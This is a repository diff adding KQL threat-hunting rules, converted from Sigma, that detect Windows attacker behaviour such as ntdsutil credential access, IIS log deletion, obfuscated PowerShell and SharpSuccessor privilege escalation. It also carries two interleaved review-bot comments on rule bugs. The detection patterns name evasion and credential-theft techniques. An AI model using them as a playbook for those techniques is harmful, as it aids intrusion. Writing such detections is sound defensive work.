+// - Msiexec.exe hiding desktop.ini
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " +h " and (FolderPath endswith "\\attrib.exe" or ProcessVersionInfoOriginalFileName =~ "ATTRIB.EXE")) and (not(ProcessCommandLine contains "\\desktop.ini ")) and (not((ProcessCommandLine =~ "+R +H +S +A \\*.cui" and InitiatingProcessCommandLine =~ "C:\\WINDOWS\\system32\\*.bat" and InitiatingProcessFolderPath endswith "\\cmd.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hiding_user_account_via_specialaccounts_registry_key_commandline.kql b/KQL/rules/windows/process_creation/hiding_user_account_via_specialaccounts_registry_key_commandline.kql
new file mode 100644
index 00000000..d83a052d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hiding_user_account_via_specialaccounts_registry_key_commandline.kql
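Review bot: The igfx false-positive exclusion at the end of the `| where` line in the attrib.exe hunk can never match, because `=~` is a whole-string case-insensitive equality and both operands keep a literal asterisk (`ProcessCommandLine =~ "+R +H +S +A \\*.cui"` and `InitiatingProcessCommandLine =~ "C:\\WINDOWS\\system32\\*.bat"`), and no real command line equals those strings. This looks like a Sigma wildcard that the converter emitted as a literal, which should be confirmed against the source rule; as written, the documented IgfxCUIService false positive is not actually suppressed. If the asterisks are wildcards, express them as prefix/suffix checks, e.g. `InitiatingProcessCommandLine startswith "C:\\WINDOWS\\system32\\" and InitiatingProcessCommandLine endswith ".bat"` together with `ProcessCommandLine contains "+R +H +S +A" and ProcessCommandLine endswith ".cui"`, or as a `matches regex` with the `*` turned into `.*`.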
@@ -0,0 +1,12 @@
+// Title: Hiding User Account Via SpecialAccounts Registry Key - CommandLine
+// Author: @Kostastsale, TheDFIRReport
+// Date: 2022-05-14
+// Level: medium
+// Description: Detects changes to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide user account from being listed on the logon screen.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.002
+// False Positives:
+// - System administrator activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList" and ProcessCommandLine contains "add" and ProcessCommandLine contains "/v" and ProcessCommandLine contains "/d 0") and FolderPath endswith "\\reg.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hktl_sharpsuccessor_privilege_escalation_tool_execution.kql b/KQL/rules/windows/process_creation/hktl_sharpsuccessor_privilege_escalation_tool_execution.kql
new file mode 100644
index 00000000..0f9efe77
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hktl_sharpsuccessor_privilege_escalation_tool_execution.kql
@@ -0,0 +1,11 @@
+// Title: HKTL - SharpSuccessor Privilege Escalation Tool Execution
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-06-06
+// Level: high
+// Description: Detects the execution of SharpSuccessor, a tool used to exploit the BadSuccessor attack for privilege escalation in WinServer 2025 Active Directory environments.
+// Successful usage of this tool can let the attackers gain the domain admin privileges by exploiting the BadSuccessor vulnerability.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.t1068
+
+DeviceProcessEvents
+| where FolderPath endswith "\\SharpSuccessor.exe" or ProcessVersionInfoOriginalFileName =~ "SharpSuccessor.exe" or ProcessCommandLine contains "SharpSuccessor" or (ProcessCommandLine contains " add " and ProcessCommandLine contains " /impersonate" and ProcessCommandLine contains " /path" and ProcessCommandLine contains " /account" and ProcessCommandLine contains " /name")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/html_help_hh_exe_suspicious_child_process.kql b/KQL/rules/windows/process_creation/html_help_hh_exe_suspicious_child_process.kql
new file mode 100644
index 00000000..48624a27
--- /dev/null
+++ b/KQL/rules/windows/process_creation/html_help_hh_exe_suspicious_child_process.kql
@@ -0,0 +1,10 @@
+// Title: HTML Help HH.EXE Suspicious Child Process
+// Author: Maxim Pavlunin, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2020-04-01
+// Level: high
+// Description: Detects a suspicious child process of a Microsoft HTML Help (HH.exe)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.initial-access, attack.t1047, attack.t1059.001, attack.t1059.003, attack.t1059.005, attack.t1059.007, attack.t1218, attack.t1218.001, attack.t1218.010, attack.t1218.011, attack.t1566, attack.t1566.001
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\CertReq.exe" or FolderPath endswith "\\CertUtil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\installutil.exe" or FolderPath endswith "\\MSbuild.exe" or FolderPath endswith "\\MSHTA.EXE" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\hh.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols_via_cli.kql b/KQL/rules/windows/process_creation/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols_via_cli.kql
new file mode 100644
index 00000000..56670f14
--- /dev/null
+++ b/KQL/rules/windows/process_creation/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols_via_cli.kql
@@ -0,0 +1,10 @@
+// Title: IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols Via CLI
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-09-05
+// Level: high
+// Description: Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProtocolDefaults" and ProcessCommandLine contains "http" and ProcessCommandLine contains " 0"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/iis_native_code_module_command_line_installation.kql b/KQL/rules/windows/process_creation/iis_native_code_module_command_line_installation.kql
new file mode 100644
index 00000000..87505a48
--- /dev/null
+++ b/KQL/rules/windows/process_creation/iis_native_code_module_command_line_installation.kql
@@ -0,0 +1,12 @@
+// Title: IIS Native-Code Module Command Line Installation
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-12-11
+// Level: medium
+// Description: Detects suspicious IIS native-code module installations via command line
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1505.003
+// False Positives:
+// - Unknown as it may vary from organisation to organisation how admins use to install IIS modules
+
+DeviceProcessEvents
+| where (((ProcessCommandLine contains "install" and ProcessCommandLine contains "module") and (ProcessCommandLine contains "-name:" or ProcessCommandLine contains "/name:" or ProcessCommandLine contains "–name:" or ProcessCommandLine contains "—name:" or ProcessCommandLine contains "―name:")) and (FolderPath endswith "\\appcmd.exe" or ProcessVersionInfoOriginalFileName =~ "appcmd.exe")) and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\inetsrv\\iissetup.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/iis_webserver_log_deletion_via_commandline_utilities.kql b/KQL/rules/windows/process_creation/iis_webserver_log_deletion_via_commandline_utilities.kql
new file mode 100644
index 00000000..56c833c8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/iis_webserver_log_deletion_via_commandline_utilities.kql
@@ -0,0 +1,14 @@
+// Title: IIS WebServer Log Deletion via CommandLine Utilities
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-09-02
+// Level: medium
+// Description: Detects attempts to delete Internet Information Services (IIS) log files via command line utilities, which is a common defense evasion technique used by attackers to cover their tracks.
+// Threat actors often abuse vulnerabilities in web applications hosted on IIS servers to gain initial access and later delete IIS logs to evade detection.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070
+// False Positives:
+// - Deletion of IIS logs that are older than a certain retention period as part of regular maintenance activities.
+// - Legitimate schedule tasks or scripts that clean up log files regularly.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "del " or ProcessCommandLine contains "erase " or ProcessCommandLine contains "rm " or ProcessCommandLine contains "remove-item " or ProcessCommandLine contains "rmdir ") and ProcessCommandLine contains "\\inetpub\\logs\\" and ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("cmd.exe", "powershell.exe", "powershell_ise.exe", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/imagingdevices_unusual_parent_child_processes.kql b/KQL/rules/windows/process_creation/imagingdevices_unusual_parent_child_processes.kql
new file mode 100644
index 00000000..eb1ce306
--- /dev/null
+++ b/KQL/rules/windows/process_creation/imagingdevices_unusual_parent_child_processes.kql
@@ -0,0 +1,10 @@
+// Title: ImagingDevices Unusual Parent/Child Processes
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-27
+// Level: high
+// Description: Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\ImagingDevices.exe" or (FolderPath endswith "\\ImagingDevices.exe" and (InitiatingProcessFolderPath endswith "\\WmiPrvSE.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/import_ldap_data_interchange_format_file_via_ldifde_exe.kql b/KQL/rules/windows/process_creation/import_ldap_data_interchange_format_file_via_ldifde_exe.kql
new file mode 100644
index 00000000..6b4d70a8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/import_ldap_data_interchange_format_file_via_ldifde_exe.kql
@@ -0,0 +1,12 @@
+// Title: Import LDAP Data Interchange Format File Via Ldifde.EXE
+// Author: @gott_cyber
+// Date: 2022-09-02
+// Level: medium
+// Description: Detects the execution of "Ldifde.exe" with the import flag "-i". The can be abused to include HTTP-based arguments which will allow the arbitrary download of files from a remote server.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.defense-evasion, attack.t1218, attack.t1105
+// False Positives:
+// - Since the content of the files are unknown, false positives are expected
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-i" and ProcessCommandLine contains "-f") and (FolderPath endswith "\\ldifde.exe" or ProcessVersionInfoOriginalFileName =~ "ldifde.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/import_powershell_modules_from_suspicious_directories_proccreation.kql b/KQL/rules/windows/process_creation/import_powershell_modules_from_suspicious_directories_proccreation.kql
new file mode 100644
index 00000000..eb08253e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/import_powershell_modules_from_suspicious_directories_proccreation.kql
@@ -0,0 +1,10 @@
+// Title: Import PowerShell Modules From Suspicious Directories - ProcCreation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-10
+// Level: medium
+// Description: Detects powershell scripts that import modules from suspicious directories
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "Import-Module \"$Env:Temp\\" or ProcessCommandLine contains "Import-Module '$Env:Temp\\" or ProcessCommandLine contains "Import-Module $Env:Temp\\" or ProcessCommandLine contains "Import-Module \"$Env:Appdata\\" or ProcessCommandLine contains "Import-Module '$Env:Appdata\\" or ProcessCommandLine contains "Import-Module $Env:Appdata\\" or ProcessCommandLine contains "Import-Module C:\\Users\\Public\\" or ProcessCommandLine contains "ipmo \"$Env:Temp\\" or ProcessCommandLine contains "ipmo '$Env:Temp\\" or ProcessCommandLine contains "ipmo $Env:Temp\\" or ProcessCommandLine contains "ipmo \"$Env:Appdata\\" or ProcessCommandLine contains "ipmo '$Env:Appdata\\" or ProcessCommandLine contains "ipmo $Env:Appdata\\" or ProcessCommandLine contains "ipmo C:\\Users\\Public\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/imports_registry_key_from_a_file.kql b/KQL/rules/windows/process_creation/imports_registry_key_from_a_file.kql
new file mode 100644
index 00000000..a0e79b65
--- /dev/null
+++ b/KQL/rules/windows/process_creation/imports_registry_key_from_a_file.kql
@@ -0,0 +1,13 @@
+// Title: Imports Registry Key From a File
+// Author: Oddvar Moe, Sander Wiebing, oscd.community
+// Date: 2020-10-07
+// Level: medium
+// Description: Detects the import of the specified file to the registry with regedit.exe.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1112, attack.defense-evasion
+// False Positives:
+// - Legitimate import of keys
+// - Evernote
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " /i " or ProcessCommandLine contains " /s " or ProcessCommandLine contains ".reg") and (FolderPath endswith "\\regedit.exe" or ProcessVersionInfoOriginalFileName =~ "REGEDIT.EXE")) and (not(((ProcessCommandLine contains " -e " or ProcessCommandLine contains " /e " or ProcessCommandLine contains " –e " or ProcessCommandLine contains " —e " or ProcessCommandLine contains " ―e " or ProcessCommandLine contains " -a " or ProcessCommandLine contains " /a " or ProcessCommandLine contains " –a " or ProcessCommandLine contains " —a " or ProcessCommandLine contains " ―a " or ProcessCommandLine contains " -c " or ProcessCommandLine contains " /c " or ProcessCommandLine contains " –c " or ProcessCommandLine contains " —c " or ProcessCommandLine contains " ―c ") and ProcessCommandLine matches regex ":[^ \\\\]")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/imports_registry_key_from_an_ads.kql b/KQL/rules/windows/process_creation/imports_registry_key_from_an_ads.kql
new file mode 100644
index 00000000..09572d16
--- /dev/null
+++ b/KQL/rules/windows/process_creation/imports_registry_key_from_an_ads.kql
@@ -0,0 +1,10 @@
+// Title: Imports Registry Key From an ADS
+// Author: Oddvar Moe, Sander Wiebing, oscd.community
+// Date: 2020-10-12
+// Level: high
+// Description: Detects the import of a alternate datastream to the registry with regedit.exe.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1112, attack.defense-evasion
+
+DeviceProcessEvents
+| where (((ProcessCommandLine contains " /i " or ProcessCommandLine contains ".reg") and ProcessCommandLine matches regex ":[^ \\\\]") and (FolderPath endswith "\\regedit.exe" or ProcessVersionInfoOriginalFileName =~ "REGEDIT.EXE")) and (not((ProcessCommandLine contains " -e " or ProcessCommandLine contains " /e " or ProcessCommandLine contains " –e " or ProcessCommandLine contains " —e " or ProcessCommandLine contains " ―e " or ProcessCommandLine contains " -a " or ProcessCommandLine contains " /a " or ProcessCommandLine contains " –a " or ProcessCommandLine contains " —a " or ProcessCommandLine contains " ―a " or ProcessCommandLine contains " -c " or ProcessCommandLine contains " /c " or ProcessCommandLine contains " –c " or ProcessCommandLine contains " —c " or ProcessCommandLine contains " ―c ")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/indirect_command_execution_by_program_compatibility_wizard.kql b/KQL/rules/windows/process_creation/indirect_command_execution_by_program_compatibility_wizard.kql
new file mode 100644
index 00000000..2a12c40e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/indirect_command_execution_by_program_compatibility_wizard.kql
@@ -0,0 +1,13 @@
+// Title: Indirect Command Execution By Program Compatibility Wizard
+// Author: A. Sungurov , oscd.community
+// Date: 2020-10-12
+// Level: low
+// Description: Detect indirect command execution via Program Compatibility Assistant pcwrun.exe
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, attack.execution
+// False Positives:
+// - Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as opposed to commonly seen artifacts
+// - Legit usage of scripts
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\pcwrun.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/indirect_command_execution_from_script_file_via_bash_exe.kql b/KQL/rules/windows/process_creation/indirect_command_execution_from_script_file_via_bash_exe.kql
new file mode 100644
index 00000000..2a87d7a5
--- /dev/null
+++ b/KQL/rules/windows/process_creation/indirect_command_execution_from_script_file_via_bash_exe.kql
@@ -0,0 +1,11 @@
+// Title: Indirect Command Execution From Script File Via Bash.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-15
+// Level: medium
+// Description: Detects execution of Microsoft bash launcher without any flags to execute the content of a bash script directly.
+// This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202
+
+DeviceProcessEvents
+| where ((FolderPath endswith ":\\Windows\\System32\\bash.exe" or FolderPath endswith ":\\Windows\\SysWOW64\\bash.exe") or ProcessVersionInfoOriginalFileName =~ "Bash.exe") and (not(((ProcessCommandLine contains "bash.exe -" or ProcessCommandLine contains "bash -") or ProcessCommandLine =~ "" or isnull(ProcessCommandLine) or (ProcessCommandLine in~ ("bash.exe", "bash")))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/indirect_inline_command_execution_via_bash_exe.kql b/KQL/rules/windows/process_creation/indirect_inline_command_execution_via_bash_exe.kql
new file mode 100644
index 00000000..6863b7f2
--- /dev/null
+++ b/KQL/rules/windows/process_creation/indirect_inline_command_execution_via_bash_exe.kql
@@ -0,0 +1,11 @@
+// Title: Indirect Inline Command Execution Via Bash.EXE
+// Author: frack113
+// Date: 2021-11-24
+// Level: medium
+// Description: Detects execution of Microsoft bash launcher with the "-c" flag.
+// This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -c " and ((FolderPath endswith ":\\Windows\\System32\\bash.exe" or FolderPath endswith ":\\Windows\\SysWOW64\\bash.exe") or ProcessVersionInfoOriginalFileName =~ "Bash.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/infdefaultinstall_exe_inf_execution.kql b/KQL/rules/windows/process_creation/infdefaultinstall_exe_inf_execution.kql
new file mode 100644
index 00000000..7d8c5ca7
--- /dev/null
+++ b/KQL/rules/windows/process_creation/infdefaultinstall_exe_inf_execution.kql
@@ -0,0 +1,10 @@
+// Title: InfDefaultInstall.exe .inf Execution
+// Author: frack113
+// Date: 2021-07-13
+// Level: medium
+// Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "InfDefaultInstall.exe " and ProcessCommandLine contains ".inf"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/insecure_proxy_doh_transfer_via_curl_exe.kql b/KQL/rules/windows/process_creation/insecure_proxy_doh_transfer_via_curl_exe.kql
new file mode 100644
index 00000000..81474161
--- /dev/null
+++ b/KQL/rules/windows/process_creation/insecure_proxy_doh_transfer_via_curl_exe.kql
@@ -0,0 +1,12 @@
+// Title: Insecure Proxy/DOH Transfer Via Curl.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-07-27
+// Level: medium
+// Description: Detects execution of "curl.exe" with the "insecure" flag over proxy or DOH.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+// - Access to badly maintained internal or development systems
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "--doh-insecure" or ProcessCommandLine contains "--proxy-insecure") and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/insecure_transfer_via_curl_exe.kql b/KQL/rules/windows/process_creation/insecure_transfer_via_curl_exe.kql
new file mode 100644
index 00000000..1538d4d3
--- /dev/null
+++ b/KQL/rules/windows/process_creation/insecure_transfer_via_curl_exe.kql
@@ -0,0 +1,12 @@
+// Title: Insecure Transfer Via Curl.EXE
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-06-30
+// Level: medium
+// Description: Detects execution of "curl.exe" with the "--insecure" flag.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+// - Access to badly maintained internal or development systems
+
+DeviceProcessEvents
+| where (ProcessCommandLine matches regex "\\s-k\\s" or ProcessCommandLine contains "--insecure") and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/insensitive_subfolder_search_via_findstr_exe.kql b/KQL/rules/windows/process_creation/insensitive_subfolder_search_via_findstr_exe.kql
new file mode 100644
index 00000000..ec6ce9a9
--- /dev/null
+++ b/KQL/rules/windows/process_creation/insensitive_subfolder_search_via_findstr_exe.kql
@@ -0,0 +1,12 @@
+// Title: Insensitive Subfolder Search Via Findstr.EXE
+// Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2020-10-05
+// Level: low
+// Description: Detects execution of findstr with the "s" and "i" flags for a "subfolder" and "insensitive" search respectively. Attackers sometimes leverage this built-in utility to search the system for interesting files or filter through results of commands.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.credential-access, attack.command-and-control, attack.t1218, attack.t1564.004, attack.t1552.001, attack.t1105
+// False Positives:
+// - Administrative or software activity
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "findstr" or FolderPath endswith "findstr.exe" or ProcessVersionInfoOriginalFileName =~ "FINDSTR.EXE") and ((ProcessCommandLine contains " -i " or ProcessCommandLine contains " /i " or ProcessCommandLine contains " –i " or ProcessCommandLine contains " —i " or ProcessCommandLine contains " ―i ") and (ProcessCommandLine contains " -s " or ProcessCommandLine contains " /s " or ProcessCommandLine contains " –s " or ProcessCommandLine contains " —s " or ProcessCommandLine contains " ―s "))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/install_new_package_via_winget_local_manifest.kql b/KQL/rules/windows/process_creation/install_new_package_via_winget_local_manifest.kql
new file mode 100644
index 00000000..0d6d9293
--- /dev/null
+++ b/KQL/rules/windows/process_creation/install_new_package_via_winget_local_manifest.kql
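Review bot: `FolderPath endswith "findstr.exe"` in the findstr hunk's `| where` line is the only image check in these hunks without the leading path separator, so it also matches any executable whose file name merely ends in that string (a constructed example: `xfindstr.exe`), whereas every sibling rule anchors on `"\\name.exe"`. This may be faithful to the Sigma source, but the inconsistency is worth either normalising in the converter or fixing in the rule as `FolderPath endswith "\\findstr.exe"`, in line with the adjacent `ProcessVersionInfoOriginalFileName =~ "FINDSTR.EXE"` check.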
@@ -0,0 +1,14 @@
+// Title: Install New Package Via Winget Local Manifest
+// Author: Sreeman, Florian Roth (Nextron Systems), frack113
+// Date: 2020-04-21
+// Level: medium
+// Description: Detects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them.
+// The manifest option enables you to install an application by passing in a YAML file directly to the client.
+// Winget can be used to download and install exe, msi or msix files later.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1059
+// False Positives:
+// - Some false positives are expected in some environment that may use this functionality to install and test their custom applications
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\winget.exe" or ProcessVersionInfoOriginalFileName =~ "winget.exe") and (ProcessCommandLine contains "install" or ProcessCommandLine contains " add ") and (ProcessCommandLine contains "-m " or ProcessCommandLine contains "--manifest")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/installation_of_wsl_kali_linux.kql b/KQL/rules/windows/process_creation/installation_of_wsl_kali_linux.kql
new file mode 100644
index 00000000..79fa93de
--- /dev/null
+++ b/KQL/rules/windows/process_creation/installation_of_wsl_kali_linux.kql
@@ -0,0 +1,13 @@
+// Title: Installation of WSL Kali-Linux
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-10-10
+// Level: high
+// Description: Detects installation of Kali Linux distribution through Windows Subsystem for Linux (WSL).
+// Attackers may use Kali Linux WSL to leverage its penetration testing tools and capabilities for malicious purposes.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+// - Legitimate installation or usage of Kali Linux WSL by administrators or security teams
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\wsl.exe" or ProcessVersionInfoOriginalFileName =~ "wsl") and (ProcessCommandLine contains " --install " or ProcessCommandLine contains " -i ") and ProcessCommandLine contains "kali"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/interactive_at_job.kql b/KQL/rules/windows/process_creation/interactive_at_job.kql
new file mode 100644
index 00000000..0feaf4ea
--- /dev/null
+++ b/KQL/rules/windows/process_creation/interactive_at_job.kql
@@ -0,0 +1,12 @@
+// Title: Interactive AT Job
+// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
+// Date: 2019-10-24
+// Level: high
+// Description: Detects an interactive AT job, which may be used as a form of privilege escalation.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.execution, attack.privilege-escalation, attack.t1053.002
+// False Positives:
+// - Unlikely (at.exe deprecated as of Windows 8)
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "interactive" and FolderPath endswith "\\at.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/interesting_service_enumeration_via_sc_exe.kql b/KQL/rules/windows/process_creation/interesting_service_enumeration_via_sc_exe.kql
new file mode 100644
index 00000000..4b71e6fc
--- /dev/null
+++ b/KQL/rules/windows/process_creation/interesting_service_enumeration_via_sc_exe.kql
@@ -0,0 +1,11 @@
+// Title: Interesting Service Enumeration Via Sc.EXE
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2024-02-12
+// Level: low
+// Description: Detects the enumeration and query of interesting and in some cases sensitive services on the system via "sc.exe".
+// Attackers often try to enumerate the services currently running on a system in order to find different attack vectors.
+// MITRE Tactic: Credential Access
+// Tags: attack.t1003, attack.credential-access
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "query" and ProcessCommandLine contains "termservice" and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/invocation_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql b/KQL/rules/windows/process_creation/invocation_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql
new file mode 100644
index 00000000..b8ff3db6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/invocation_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql
@@ -0,0 +1,12 @@
+// Title: Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)
+// Author: Thomas Patzke
+// Date: 2019-01-16
+// Level: medium
+// Description: Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.003
+// False Positives:
+// - NTDS maintenance
+
+DeviceProcessEvents
+| where FolderPath endswith "\\ntdsutil.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/invoke_obfuscation_clip_launcher.kql b/KQL/rules/windows/process_creation/invoke_obfuscation_clip_launcher.kql
new file mode 100644
index 00000000..d4bf3bbf
--- /dev/null
+++ b/KQL/rules/windows/process_creation/invoke_obfuscation_clip_launcher.kql
@@ -0,0 +1,10 @@
+// Title: Invoke-Obfuscation CLIP+ Launcher
+// Author: Jonathan Cheong, oscd.community
+// Date: 2020-10-13
+// Level: high
+// Description: Detects Obfuscated use of Clip.exe to execute PowerShell
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/c" or ProcessCommandLine contains "/r") and (ProcessCommandLine contains "cmd" and ProcessCommandLine contains "&&" and ProcessCommandLine contains "clipboard]::" and ProcessCommandLine contains "-f")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/invoke_obfuscation_compress_obfuscation.kql b/KQL/rules/windows/process_creation/invoke_obfuscation_compress_obfuscation.kql
new file mode 100644
index 00000000..1ecf0bba
--- /dev/null
+++ b/KQL/rules/windows/process_creation/invoke_obfuscation_compress_obfuscation.kql
@@ -0,0 +1,10 @@
+// Title: Invoke-Obfuscation COMPRESS OBFUSCATION
+// Author: Timur Zinniatullin, oscd.community
+// Date: 2020-10-18
+// Level: medium
+// Description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "system.io.compression.deflatestream" or ProcessCommandLine contains "system.io.streamreader" or ProcessCommandLine contains "readtoend(") and (ProcessCommandLine contains "new-object" and ProcessCommandLine contains "text.encoding]::ascii")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/invoke_obfuscation_obfuscated_iex_invocation.kql b/KQL/rules/windows/process_creation/invoke_obfuscation_obfuscated_iex_invocation.kql
new file mode 100644
index 00000000..d5e8ee7d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/invoke_obfuscation_obfuscated_iex_invocation.kql
@@ -0,0 +1,10 @@
+// Title: Invoke-Obfuscation Obfuscated IEX Invocation
+// Author: Daniel Bohannon (@Mandiant/@FireEye), oscd.community
+// Date: 2019-11-08
+// Level: high
